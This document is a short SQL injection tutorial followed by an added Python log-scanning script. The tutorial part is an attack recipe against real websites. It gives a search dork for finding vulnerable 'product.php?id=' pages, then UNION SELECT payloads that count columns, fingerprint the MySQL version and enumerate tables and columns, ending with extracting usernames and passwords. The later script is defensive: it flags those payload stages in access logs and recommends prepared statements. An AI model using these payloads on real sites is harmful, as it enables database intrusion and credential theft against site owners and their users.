*Step-by-Step SQL Injection
- inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"
- order by 1-- and keep going until you hit an error
- union all select N --
N = up to the number at which the order by step above returned an error
(once a number shows up on the page, that position is the vulnerable one)
- union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16--
- the vulnerable position is number 4; version() there shows the MySQL version
- union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where table_schema=database()--
- add +from+information_schema.tables+where+table_schema=database()-- and replace version with group_concat
- union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns+where+table_name=0x6c6f67696e--
replace the table name with its hex encoding
http://cyber4rt.com/~converter
and there you have the user and password
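Seen from the defender's side, each step above leaves a recognizable trace in the web server's access log. The script below is an added example, not part of the original post: it flags those stages in request query strings, and its log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One pattern per stage of the procedure described above.
STAGES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version fingerprint", re.compile(r"\bversion\s*\(\s*\)|@@version", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("hex-encoded identifier", re.compile(r"=\s*0x[0-9a-f]{4,}", re.I)),
]
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)  # /**/ is often used in place of spaces
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /product.php?id=5 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /product.php?id=5+order+by+17-- HTTP/1.1" 500 98',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /product.php?id=5+union+all+select+1,2,3,version(),5-- HTTP/1.1" 200 530',
    '203.0.113.7 - - [01/Jan/2024:10:00:14 +0000] "GET /product.php?id=5+UNION%20ALL/**/SELECT+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x6c6f67696e-- HTTP/1.1" 200 700',
]

def normalize(query):
    """Decode '+' and %xx (twice, to catch double encoding), drop inline comments, collapse spaces."""
    text = unquote_plus(unquote_plus(query))
    text = INLINE_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text)

def classify(request_target):
    """Return the names of the stages whose pattern appears in the query string."""
    query = normalize(urlsplit(request_target).query)
    return [name for name, pattern in STAGES if pattern.search(query)]

def scan(log_lines):
    """Return (client, path, stages) for every log line whose query string matches a stage."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        stages = classify(m.group(2))
        if stages:
            hits.append((m.group(1), urlsplit(m.group(2)).path, stages))
    return hits

if __name__ == "__main__":
    for client, path, stages in scan(SAMPLE_LOG):
        print(client, path, ", ".join(stages))
```

These patterns are a triage aid for logs; the fix for the underlying flaw is to bind the id parameter in a prepared statement so it is never parsed as SQL.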
Visit the link below…
http://opensource.telkomspeedy.com/wiki/index.php/SQL_Injection_Web_dengan_Dork